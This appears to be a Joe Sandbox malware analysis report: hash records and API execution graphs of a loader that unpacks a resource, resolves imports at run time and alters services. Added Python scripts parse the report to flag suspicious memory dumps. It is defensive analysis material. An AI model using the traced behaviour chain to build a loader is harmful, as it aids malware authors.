• Snapshot File: hcaresult_2_2_2db0000_x.jbxd
Similarity
• API ID: Read$Write
• String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3448952669-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 58891c96ade314b417e5d1c5876a09d7ac42534aea6cb2bf4f451feff6a0f628
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9183a96234abd28fa760f8205a755d9082090f483e4b04655cb7e9ac6d59d85
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7219DB264061E9BDB11DFB9CC80BAE73A9EF80366F108555FD1497380DB34EC12CAA0

Execution Graph

Execution Coverage: 10%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 3.1%
Total number of Nodes: 32
Total number of Limit Nodes: 2

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000001.2160197116.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000001.2160197116.0000000000571000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_1_400000_aymtmquJ.jbxd
Similarity
• API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
• String ID: %s\%s
• API String ID: 2742963760-4073750446
• Opcode ID: 9a82770f71db8e48869979fa4d59a48c1d69027196fbdec4bdf6d8a9b1bdd036
• Instruction ID: ce340559ed643e80c0758f702ca7b046c498c1d309c8b568501c00ab43499a41
• Opcode Fuzzy Hash: 9a82770f71db8e48869979fa4d59a48c1d69027196fbdec4bdf6d8a9b1bdd036
• Instruction Fuzzy Hash: FE7125F1E001049BDB54DB5CDC81BDE77B9EB44309F04417AF60AFB391E639AA848B59
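The function records above (process 2's dump at 02DB0000 and process 8's dump at 00400000) are easier to triage when the dotted `.sdmp` filename and the `API ID` / `String ID` / `Instruction Fuzzy Hash` lines are parsed rather than read by eye. The following Python is an added example, not part of this report and not Joe Sandbox's own code. It embeds the records from this page as constructed sample input, splits the `.sdmp` name into its dotted fields, and decodes the fifth field as a Windows `PAGE_*` protection constant. That field mapping, the meaning of the remaining fields, and the `flag_dumps` heuristic (an RWX dump that the report parsed as a PE and whose functions reference shell execution or file writes) are assumptions of this example; the report itself does not document them. Note that the report joins API names with `$` and that, in the extracted text, the names inside the last group run together; the parser keeps each `$`-separated group as one string.

```python
"""Parse Joe Sandbox function records (extracted as text) and summarise them per memory dump.

Added example; not Joe Sandbox code. Field semantics of the .sdmp name are assumptions.
"""
import re

# Constructed sample input: the records copied from this report page (bullets kept as extracted).
SAMPLE = """\
• Source File: 00000002.00000002.2215006421.0000000002DB1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: true
• API ID: Read$Write
• Instruction Fuzzy Hash: C7219DB264061E9BDB11DFB9CC80BAE73A9EF80366F108555FD1497380DB34EC12CAA0
• Source File: 00000008.00000001.2160197116.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: EntryPoint$memset$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
• String ID: %s\\%s
• Instruction Fuzzy Hash: FE7125F1E001049BDB54DB5CDC81BDE77B9EB44309F04417AF60AFB391E639AA848B59
• Source File: 00000008.00000001.2160197116.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• API ID: malloc
• String ID: 1e.ch9yg]$_)!/8(6a9yqp82eb1<j)m9
• Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45
"""

# Assumption: the fifth dotted field is a Windows PAGE_* memory protection value.
PAGE_PROTECT = {
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
}

# Assumed layout: pid.run.dump_id.base.protect.f6.f7.f8.sdmp (f6..f8 kept raw, meaning unknown here).
SDMP_RE = re.compile(
    r"^(?P<pid>[0-9A-Fa-f]{8})\.(?P<run>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<f6>[0-9A-Fa-f]{8})\.(?P<f7>[0-9A-Fa-f]{8})\.(?P<f8>[0-9A-Fa-f]{8})\.sdmp$"
)
SOURCE_RE = re.compile(r"Source File: (\S+\.sdmp), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")


def parse_sdmp_name(name):
    """Split a .sdmp filename into numeric fields and decode the protection value."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not an .sdmp name: {name}")
    protect = int(m["protect"], 16)
    return {
        "pid": int(m["pid"], 16),
        "run": int(m["run"], 16),
        "dump_id": int(m["dump_id"]),
        "base": int(m["base"], 16),
        "protect": protect,
        "protect_name": PAGE_PROTECT.get(protect, f"0x{protect:x}"),
        "raw_fields": (m["f6"], m["f7"], m["f8"]),
    }


def parse_records(text):
    """Group the bullet lines into one record per 'Source File' line."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        src = SOURCE_RE.match(line)
        if src:
            cur = {"dump": parse_sdmp_name(src.group(1)), "offset": int(src.group(2), 16),
                   "pe": src.group(3) == "true", "api_groups": [], "string_id": "", "fuzzy": ""}
            records.append(cur)
        elif cur is None:
            continue
        elif line.startswith("API ID:"):
            cur["api_groups"] = [g for g in line[len("API ID:"):].strip().split("$") if g]
        elif line.startswith("String ID:"):
            cur["string_id"] = line[len("String ID:"):].strip()
        elif line.startswith("Instruction Fuzzy Hash:"):
            cur["fuzzy"] = line[len("Instruction Fuzzy Hash:"):].strip()
    return records


def summarize(records):
    """Aggregate records per (pid, base): protection, PE flag, function count, APIs, strings."""
    out = {}
    for r in records:
        d = r["dump"]
        s = out.setdefault((d["pid"], d["base"]), {
            "protect": d["protect_name"], "rwx": d["protect"] == 0x40, "pe": r["pe"],
            "functions": 0, "apis": set(), "strings": set()})
        s["functions"] += 1
        s["apis"].update(r["api_groups"])
        if r["string_id"]:
            s["strings"].add(r["string_id"])
    return out


def flag_dumps(summary):
    """Assumed heuristic: RWX dump parsed as a PE whose functions reach shell execution or file writes."""
    return [key for key, s in sorted(summary.items())
            if s["rwx"] and s["pe"] and any("ExecuteShell" in a or "fwrite" in a for a in s["apis"])]


if __name__ == "__main__":
    summary = summarize(parse_records(SAMPLE))
    for (pid, base), s in sorted(summary.items()):
        print(f"pid {pid} base 0x{base:08x} {s['protect']} functions={s['functions']} apis={sorted(s['apis'])}")
    print("flagged:", [f"pid {p} @ 0x{b:08x}" for p, b in flag_dumps(summary)])
```

Run stand-alone, the script prints one line per dump and lists process 8's 0x400000 region as flagged; process 2's 0x2DB1000 region is executable but not writable under the assumed decoding, so it is not. Treat the flag as a prompt to look at the dump, not as a verdict: the report's own signatures (process hollowing, RWX allocations in foreign processes) are the grounded evidence.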

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000008.00000001.2160197116.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000001.2160197116.0000000000571000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_1_400000_aymtmquJ.jbxd
Similarity
• API ID: EntryPoint$ExecuteShellfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
• String ID:
• API String ID: 2992075992-0
• Opcode ID: 1e2f484b0497d23900be518c397f8deb832c2e715262163bef3f91ab169fcff9
• Instruction ID: 3ba0f7a8f6b0ede00da755a29cfea894b35039c78ebbae5d4c541c040a1a5c4d
• Opcode Fuzzy Hash: 1e2f484b0497d23900be518c397f8deb832c2e715262163bef3f91ab169fcff9
• Instruction Fuzzy Hash: 184155F0E001049BDF58DB58DC91B9E77B9DB44309F0441B9F60AFB391E538AA88CB59

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000008.00000001.2160197116.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000001.2160197116.0000000000571000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_1_400000_aymtmquJ.jbxd
Similarity
• API ID: __getmainargs__set_app_type_controlfpexitmemset
• String ID:
• API String ID: 1611591150-0
• Opcode ID: 30adea5ed2e89b665672731fce5e9ff8860a77503ba1e36038058b9968a07e75
• Instruction ID: 27ee011044e7d5e793fd8ebd023162aebb77fc20787e11e0718a971f15838409
• Opcode Fuzzy Hash: 30adea5ed2e89b665672731fce5e9ff8860a77503ba1e36038058b9968a07e75
• Instruction Fuzzy Hash: 7A1121F5E00104BBCB00EBACEC85F5B77ACA798304F104479F909E73A1E979EA489765

Control-flow Graph

Basic blocks:
• 25: 401000-40102e (calls malloc)
• 26: 401031-401039
• 27: 401087-40108b
• 28: 40103f-401085
Edges: 25->26, 26->27, 26->28, 28->26
APIs
Strings
• 1e.ch9yg]$_)!/8(6a9yqp82eb1<j)m9, xrefs: 0040106E
Memory Dump Source
• Source File: 00000008.00000001.2160197116.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000001.2160197116.0000000000571000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_1_400000_aymtmquJ.jbxd
Similarity
• API ID: malloc
• String ID: 1e.ch9yg]$_)!/8(6a9yqp82eb1<j)m9
• API String ID: 2803490479-4106697161
• Opcode ID: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
• Instruction ID: 9430970044b5224a9c12c246655217461080a0914b4116f12426152c687b188d
• Opcode Fuzzy Hash: 9b87e1f0081ca89dfff0da140871b25e0bf5e5df9078889f7e82ab436f17736e
• Instruction Fuzzy Hash: 1B110CB0A05248EFCB04CFACD4907ADBBF1EF49304F1480AAE856E7391D635AE41DB45

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 31 4013ff-401452 call 401358 call 40108c call 4013b4
Strings
Memory Dump Source
• Source File: 00000008.00000001.2160197116.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000001.2160197116.0000000000571000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_1_400000_aymtmquJ.jbxd
Similarity
• API ID: memset$EntryPointfopenstrcmpstrcpy
• String ID: D`:vD`:v$D`:vD`:v
• API String ID: 4108700736-3916433284
• Opcode ID: e70adf032cf798848583b43af165d073945fb1fdf9c0c30cb4fa9c55dde59d28
• Instruction ID: e83efdde7d34d28be519ed2e6888d9f42519b086e2d7e65c64a29ab7e0d92d08
• Opcode Fuzzy Hash: e70adf032cf798848583b43af165d073945fb1fdf9c0c30cb4fa9c55dde59d28
• Instruction Fuzzy Hash: 99F0F8B4E00209EFCB40EFADE981D8A77F8AB48304F104075F908D7751EA34EA488B64
Memory Dump Source
• Source File: 00000008.00000001.2160197116.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000001.2160197116.0000000000571000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_1_400000_aymtmquJ.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fe582e1601d302cbce5191f416901be7296c06efa158ae4c5e559ae214290ed6
• Instruction ID: b1c6e75d1534d4ff429dcf23c48c92ba32bf87342ab72c3f2d9668836e4f8392
• Opcode Fuzzy Hash: fe582e1601d302cbce5191f416901be7296c06efa158ae4c5e559ae214290ed6
• Instruction Fuzzy Hash: C0A001B6E1AA80DEC3120E24BC662543EA4A93620670A25B3845287062A1694C08A721

Execution Graph

Execution Coverage: 7.6%
Dynamic/Decrypted Code Coverage: 38.2%
Signature Coverage: 33.1%
Total number of Nodes: 254
Total number of Limit Nodes: 25
                                                                                                                                                                                                                                                                                                                                  execution_graph 49824 825085 49825 825089 49824->49825 49826 82506f 49824->49826 49829 848550 49826->49829 49828 825078 49832 848556 49829->49832 49830 848145 GetLastError 49854 847dd7 49830->49854 49831 847d37 49831->49828 49832->49829 49832->49830 49832->49831 49835 848bc1 GetLastError 49832->49835 49836 848986 SetEntriesInAclW 49832->49836 49837 84890b LocalFree 49832->49837 49839 8489cd OpenMutexW 49832->49839 49844 847d30 49832->49844 49846 848599 49832->49846 49848 847d20 49832->49848 49849 84896a wsprintfW 49832->49849 49850 848953 AllocateAndInitializeSid 49832->49850 49851 848f87 wsprintfW 49832->49851 49832->49854 49833 8483fb GetUserNameW 49833->49854 49834 848209 GetUserNameW 49834->49831 49834->49854 49835->49832 49836->49832 49837->49832 49838 848248 49840 84824a GetLastError 49838->49840 49839->49828 49840->49828 49842 847d6c GetVolumeInformationW 49842->49828 49843 84836e GetLastError 49843->49854 49844->49831 49844->49842 49845 847fd4 GetLastError 49845->49854 49846->49844 49846->49849 49847 847d83 GetWindowsDirectoryW 49847->49831 49847->49844 49848->49831 49848->49842 49848->49844 49848->49847 49852 847e06 GetComputerNameW 49848->49852 49849->49844 49850->49832 49851->49831 49852->49831 49853 847f6b GetVolumeInformationW 49853->49854 49854->49830 49854->49831 49854->49833 49854->49834 49854->49838 49854->49840 49854->49842 49854->49843 49854->49844 49854->49845 49854->49848 49854->49853 49908 825a3b 49909 825a45 49908->49909 49914 824f7c 49908->49914 49910 825a4b CreateThread 49909->49910 49911 8251ae 49909->49911 49912 825a59 RtlExitUserThread 49910->49912 49918 825b1d 49912->49918 49913 824f88 49914->49913 49915 825d20 2 API 
calls 49914->49915 49917 824f99 49915->49917 49919 825d20 2 API calls 49918->49919 49920 825b3c 49919->49920 49855 59afeb0 49856 59afef6 GlobalMemoryStatusEx 49855->49856 49857 59aff26 49856->49857 49921 2cc0c10 49922 2cc0c19 49921->49922 49925 2cc4acf 49921->49925 49928 2cc3d8a 49921->49928 49931 2cc9080 49925->49931 49930 2cc9080 VirtualProtect 49928->49930 49929 2cc3da6 49930->49929 49933 2cc9093 49931->49933 49935 2cc9130 49933->49935 49936 2cc9178 VirtualProtect 49935->49936 49938 2cc4af1 49936->49938 49939 40cbdd 49940 40cbe9 49939->49940 49983 40d534 HeapCreate 49940->49983 49943 40cc46 50044 41087e 71 API calls 8 library calls 49943->50044 49946 40cc4c 49947 40cc50 49946->49947 49948 40cc58 __RTC_Initialize 49946->49948 50045 40cbb4 62 API calls 3 library calls 49947->50045 49985 411a15 67 API calls 2 library calls 49948->49985 49950 40cc57 49950->49948 49952 40cc66 49953 40cc72 GetCommandLineA 49952->49953 49954 40cc6a 49952->49954 49986 412892 71 API calls 3 library calls 49953->49986 50046 40e79a 62 API calls 3 library calls 49954->50046 49957 40cc71 49957->49953 49958 40cc82 50047 4127d7 107 API calls 3 library calls 49958->50047 49960 40cc8c 49961 40cc90 49960->49961 49962 40cc98 49960->49962 50048 40e79a 62 API calls 3 library calls 49961->50048 49987 41255f 106 API calls 6 library calls 49962->49987 49965 40cc97 49965->49962 49966 40cc9d 49967 40cca1 49966->49967 49968 40cca9 49966->49968 50049 40e79a 62 API calls 3 library calls 49967->50049 49988 40e859 73 API calls 5 library calls 49968->49988 49971 40cca8 49971->49968 49972 40ccb0 49973 40ccb5 49972->49973 49974 40ccbc 49972->49974 50050 40e79a 62 API calls 3 library calls 49973->50050 49989 4019f0 OleInitialize 49974->49989 49977 40ccd8 49979 40ccea 49977->49979 50051 40ea0a 62 API calls _doexit 49977->50051 49978 40ccbb 49978->49974 50052 40ea36 62 API calls _doexit 49979->50052 49982 40ccef __mtinitlocknum 49984 40cc3a 49983->49984 49984->49943 50043 40cbb4 62 API calls 3 library calls 
49984->50043 49985->49952 49986->49958 49987->49966 49988->49972 49990 401ab9 49989->49990 50053 40b99e 49990->50053 49992 401abf 49993 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 49992->49993 50023 402467 49992->50023 49994 401dc3 CloseHandle GetModuleHandleA 49993->49994 50001 401c55 49993->50001 50066 401650 49994->50066 49996 401e8b FindResourceA LoadResource LockResource SizeofResource 50068 40b84d 49996->50068 50000 401c9c CloseHandle 50000->49977 50001->50000 50006 401cf9 Module32Next 50001->50006 50002 401ecb _memset 50003 401efc SizeofResource 50002->50003 50004 401f1c 50003->50004 50005 401f5f 50003->50005 50004->50005 50124 401560 __VEC_memcpy __fptostr 50004->50124 50008 401f92 _memset 50005->50008 50125 401560 __VEC_memcpy __fptostr 50005->50125 50006->49994 50015 401d0f 50006->50015 50010 401fa2 FreeResource 50008->50010 50011 40b84d _malloc 62 API calls 50010->50011 50012 401fbb SizeofResource 50011->50012 50013 401fe5 _memset 50012->50013 50014 4020aa LoadLibraryA 50013->50014 50016 401650 50014->50016 50015->50000 50018 401dad Module32Next 50015->50018 50017 40216c GetProcAddress 50016->50017 50019 4021aa 50017->50019 50017->50023 50018->49994 50018->50015 50019->50023 50098 4018f0 50019->50098 50021 40243f 50021->50023 50126 40b6b5 62 API calls 2 library calls 50021->50126 50023->49977 50024 4021f1 50024->50021 50110 401870 50024->50110 50026 402269 VariantInit 50027 401870 75 API calls 50026->50027 50028 40228b VariantInit 50027->50028 50029 4022a7 50028->50029 50030 4022d9 SafeArrayCreate SafeArrayAccessData 50029->50030 50115 40b350 50030->50115 50033 40232c 50034 402354 SafeArrayDestroy 50033->50034 50042 40235b 50033->50042 50034->50042 50035 402392 SafeArrayCreateVector 50036 4023a4 50035->50036 50037 4023bc VariantClear VariantClear 50036->50037 50117 4019a0 50037->50117 50040 40242e 50041 4019a0 65 API calls 50040->50041 50041->50021 50042->50035 50043->49943 50044->49946 50045->49950 50046->49957 50047->49960 
50048->49965 50049->49971 50050->49978 50051->49979 50052->49982 50054 40b9aa __mtinitlocknum _strnlen 50053->50054 50055 40b9b8 50054->50055 50059 40b9ec 50054->50059 50127 40bfc1 62 API calls __getptd_noexit 50055->50127 50057 40b9bd 50128 40e744 6 API calls 2 library calls 50057->50128 50129 40d6e0 62 API calls 2 library calls 50059->50129 50061 40b9f3 50130 40b917 120 API calls 3 library calls 50061->50130 50063 40b9cd __mtinitlocknum 50063->49992 50064 40b9ff 50131 40ba18 LeaveCriticalSection _doexit 50064->50131 50067 4017cc ___crtGetEnvironmentStringsA 50066->50067 50067->49996 50069 40b900 50068->50069 50079 40b85f 50068->50079 50139 40d2e3 6 API calls __decode_pointer 50069->50139 50071 40b906 50140 40bfc1 62 API calls __getptd_noexit 50071->50140 50076 40b8bc RtlAllocateHeap 50076->50079 50077 40b870 50077->50079 50132 40ec4d 62 API calls 2 library calls 50077->50132 50133 40eaa2 62 API calls 7 library calls 50077->50133 50134 40e7ee GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 50077->50134 50079->50076 50079->50077 50080 40b8ec 50079->50080 50083 40b8f1 50079->50083 50085 401ebf 50079->50085 50135 40b7fe 62 API calls 4 library calls 50079->50135 50136 40d2e3 6 API calls __decode_pointer 50079->50136 50137 40bfc1 62 API calls __getptd_noexit 50080->50137 50138 40bfc1 62 API calls __getptd_noexit 50083->50138 50086 40af66 50085->50086 50088 40af70 50086->50088 50087 40b84d _malloc 62 API calls 50087->50088 50088->50087 50089 40af8a 50088->50089 50093 40af8c std::bad_alloc::bad_alloc 50088->50093 50141 40d2e3 6 API calls __decode_pointer 50088->50141 50089->50002 50091 40afb2 50143 40af49 62 API calls std::exception::exception 50091->50143 50093->50091 50142 40d2bd 73 API calls __cinit 50093->50142 50094 40afbc 50144 40cd39 RaiseException 50094->50144 50097 40afca 50099 401903 lstrlenA 50098->50099 50100 4018fc 50098->50100 50145 4017e0 72 API calls 3 library calls 50099->50145 50100->50024 50102 40191f MultiByteToWideChar 50103 401940 
GetLastError 50102->50103 50104 401996 50102->50104 50105 40194b MultiByteToWideChar 50103->50105 50106 40198d 50103->50106 50104->50024 50146 4017e0 72 API calls 3 library calls 50105->50146 50106->50104 50147 401030 GetLastError 50106->50147 50109 401970 MultiByteToWideChar 50109->50106 50111 40af66 74 API calls 50110->50111 50112 40187c 50111->50112 50113 401885 SysAllocString 50112->50113 50114 4018a4 50112->50114 50113->50114 50114->50026 50116 40231a SafeArrayUnaccessData 50115->50116 50116->50033 50118 4019df VariantClear 50117->50118 50119 4019aa InterlockedDecrement 50117->50119 50118->50040 50119->50118 50120 4019b8 50119->50120 50120->50118 50121 4019c2 SysFreeString 50120->50121 50122 4019c9 50120->50122 50121->50122 50148 40aec0 63 API calls 2 library calls 50122->50148 50124->50004 50125->50008 50126->50023 50127->50057 50129->50061 50130->50064 50131->50063 50132->50077 50133->50077 50135->50079 50136->50079 50137->50083 50138->50085 50139->50071 50140->50085 50141->50088 50142->50091 50143->50094 50144->50097 50145->50102 50146->50109 50148->50118 49858 82520c 49861 84cbd0 49858->49861 49860 825211 49879 84be50 _wcslen 49861->49879 49862 84c168 49900 84a905 LocalFree 49862->49900 49865 84c78e CloseServiceHandle 49865->49879 49866 84bffd StrStrIW 49866->49879 49867 84c706 StrStrIW 49867->49879 49869 84bf68 StrStrIW 49869->49879 49870 84c72b StrStrIW 49870->49879 49871 84c399 StrStrIW 49876 84c3a9 49871->49876 49871->49879 49872 84bf7e 49875 84c7e4 StartServiceW 49872->49875 49877 84c36b OpenServiceW 49872->49877 49873 84c0fd CloseServiceHandle 49873->49879 49875->49879 49876->49860 49877->49879 49878 84c65a ChangeServiceConfigW 49878->49879 49880 84bfe9 49878->49880 49879->49860 49879->49861 49879->49862 49879->49865 49879->49866 49879->49867 49879->49869 49879->49870 49879->49871 49879->49872 49879->49873 49879->49875 49879->49878 49879->49880 49881 82ce90 49879->49881 49899 84a350 CloseServiceHandle 49879->49899 49901 825d20 49879->49901 
49880->49860 49897 82cc9b _wcslen 49881->49897 49882 82d729 GetFileSizeEx 49886 82d8a1 CloseHandle 49882->49886 49882->49897 49883 825d20 VirtualAlloc VirtualFree 49883->49897 49884 82d426 49884->49886 49887 82d42a CloseHandle 49884->49887 49885 82d5c5 CreateFileW 49885->49897 49886->49897 49887->49897 49888 82cd5c lstrcmpiW 49888->49897 49890 82cc92 49890->49879 49891 82cca0 lstrcmpiW 49891->49897 49893 82d049 SetFilePointerEx 49893->49897 49894 82d378 CloseHandle 49894->49897 49895 85fdfc 40 API calls 49898 82d903 49895->49898 49896 82cfbb GetFileTime 49896->49897 49897->49879 49897->49881 49897->49882 49897->49883 49897->49884 49897->49885 49897->49886 49897->49887 49897->49888 49897->49890 49897->49891 49897->49893 49897->49894 49897->49896 49897->49898 49906 828937 VirtualAlloc VirtualFree 49897->49906 49907 828470 VirtualAlloc VirtualFree 49897->49907 49898->49890 49898->49895 49899->49879 49900->49880 49902 825d22 49901->49902 49902->49879 49903 825d39 VirtualAlloc 49902->49903 49905 825d46 VirtualFree 49902->49905 49903->49902 49905->49879 49906->49897 49907->49897
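The execution graph above is the text serialisation of the graph Joe Sandbox draws: each node record is a decimal node id, a hex address and the API names reached at that address, and each `a->b` token is an edge. Walking it from the OleInitialize node recovers the loader's order of operations as the report shows it: enumerate the process's own modules (CreateToolhelp32Snapshot, Module32First, Module32Next), locate and map a resource in the image (FindResourceA, LoadResource, LockResource, SizeofResource), copy it to heap memory, then resolve an export at run time (LoadLibraryA, GetProcAddress) before the SafeArray and Variant calls. The following Python is an added example and is not part of the Joe Sandbox report or of the sample: it parses that token format, walks the graph depth-first and checks for the resource-unpacking chain. The embedded excerpt is constructed: node ids, addresses and API names are copied from the graph above, but the CRT nodes in between were dropped and their edges collapsed. The chain itself (`RESOURCE_UNPACK_CHAIN`) is a heuristic chosen here from what this graph shows, not a Joe Sandbox signature.

```python
"""Parse a Joe Sandbox 'execution_graph' token dump and walk it to recover
the ordered Win32 API chain a loader executes.

Added example; not code from the Joe Sandbox report or from the sample."""
import re
from collections import defaultdict

# Constructed excerpt: ids, addresses and API names are taken from the
# report's execution graph, intermediate CRT nodes were removed and their
# edges collapsed so the walk stays short.
SAMPLE_GRAPH = (
    "execution_graph 49989 4019f0 OleInitialize 49989->49990 49990 401ab9 "
    "49990->49992 49992 401abf 49992->49993 "
    "49993 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First "
    "49993->49994 49994 401dc3 CloseHandle GetModuleHandleA 49994->49996 "
    "49996 401e8b FindResourceA LoadResource LockResource SizeofResource "
    "49996->50002 50002 401ecb _memset 50002->50010 50010 401fa2 FreeResource "
    "50010->50014 50014 4020aa LoadLibraryA 50014->50017 50017 40216c GetProcAddress "
    "50017->50030 50030 4022d9 SafeArrayCreate SafeArrayAccessData 50030->49915 "
    "49915 825d20 2 API calls"
)

_NODE_ID = re.compile(r"^\d+$")
_ADDRESS = re.compile(r"^[0-9a-f]{4,8}$")
_EDGE = re.compile(r"^(\d+)->(\d+)$")
# Words Joe Sandbox uses in summary labels such as '2 API calls' or
# '62 API calls 3 library calls'; they are not API names.
_NOISE = {"API", "calls", "library"}


def parse_execution_graph(text):
    """Return (nodes, edges). nodes: id -> (address, [labels]); edges: id -> [ids]."""
    tokens = text.split()
    nodes, edges = {}, defaultdict(list)
    current = None
    i = 1 if tokens and tokens[0] == "execution_graph" else 0
    while i < len(tokens):
        tok = tokens[i]
        edge = _EDGE.match(tok)
        if edge:
            edges[edge.group(1)].append(edge.group(2))
            i += 1
            continue
        # A node record is a decimal id followed by a hex address. A count such
        # as the '2' in '2 API calls' is followed by a word, so it stays a label.
        if _NODE_ID.match(tok) and i + 1 < len(tokens) and _ADDRESS.match(tokens[i + 1]):
            current = tok
            nodes[current] = (tokens[i + 1], [])
            i += 2
            continue
        if current is not None:
            nodes[current][1].append(tok)
        i += 1
    return nodes, dict(edges)


def api_sequence(nodes, edges, start):
    """Depth-first walk from `start`; returns API names in visit order.
    Digit-only labels and summary words are dropped; each node is visited once."""
    seen, order, stack = set(), [], [start]
    while stack:
        node = stack.pop()
        if node in seen or node not in nodes:
            continue
        seen.add(node)
        order.extend(l for l in nodes[node][1] if not l.isdigit() and l not in _NOISE)
        # Push successors reversed so the first-listed edge is walked first.
        stack.extend(reversed(edges.get(node, [])))
    return order


def contains_chain(sequence, chain):
    """True if every element of `chain` occurs in `sequence` in that order
    (not necessarily adjacent). Order matters: LoadResource before
    FindResourceA does not match."""
    it = iter(sequence)
    return all(any(step == s for s in it) for step in chain)


# Heuristic chain (assumption, not a Joe Sandbox signature): enumerate own
# modules, pull a resource out of the image, then resolve an import at run time.
RESOURCE_UNPACK_CHAIN = [
    "CreateToolhelp32Snapshot", "Module32First",
    "FindResourceA", "LoadResource", "LockResource", "SizeofResource",
    "LoadLibraryA", "GetProcAddress",
]


def flag_resource_unpacking(text, start):
    """Parse `text`, walk from `start`, and return (chain_present, api_sequence)."""
    nodes, edges = parse_execution_graph(text)
    seq = api_sequence(nodes, edges, start)
    return contains_chain(seq, RESOURCE_UNPACK_CHAIN), seq


if __name__ == "__main__":
    hit, seq = flag_resource_unpacking(SAMPLE_GRAPH, "49989")
    print("resource-unpack chain present:", hit)
    print(" -> ".join(seq))
```

Starting the walk at the LoadLibraryA node instead of OleInitialize yields only the tail of the sequence and the chain check fails, which is the intended behaviour: the heuristic keys on the resource APIs preceding the dynamic resolution, not on LoadLibraryA/GetProcAddress alone, since those two appear in plenty of benign code.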

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                                                                                                                  control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 23 401c85-401c8d 19->23 20->21 24 401cb0-401cce call 401650 21->24 25 401c9c-401caf CloseHandle 21->25 23->14 23->20 32 401cd0-401cd4 24->32 31 401ef3-401f1a call 401300 SizeofResource 27->31 28->31 41 401f1c-401f2f 31->41 42 401f5f-401f69 31->42 35 401cf0-401cf2 32->35 36 401cd6-401cd8 32->36 40 401cf5-401cf7 35->40 38 401cda-401ce0 36->38 39 401cec-401cee 36->39 38->35 45 401ce2-401cea 38->45 39->40 40->25 46 401cf9-401d09 Module32Next 40->46 47 401f33-401f5d call 401560 41->47 43 401f73-401f75 42->43 44 401f6b-401f72 42->44 49 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 43->49 50 401f77-401f8d call 401560 43->50 44->43 45->32 45->39 46->7 51 401d0f 46->51 47->42 49->5 85 4021aa-4021c0 49->85 50->49 55 401d10-401d2e call 401650 51->55 61 401d30-401d34 55->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 67 401d55-401d57 63->67 65 401d3a-401d40 64->65 66 401d4c-401d4e 64->66 65->63 69 401d42-401d4a 65->69 66->67 67->25 70 401d5d-401d7b call 401650 67->70 69->61 69->66 77 401d80-401d84 70->77 79 401da0-401da2 
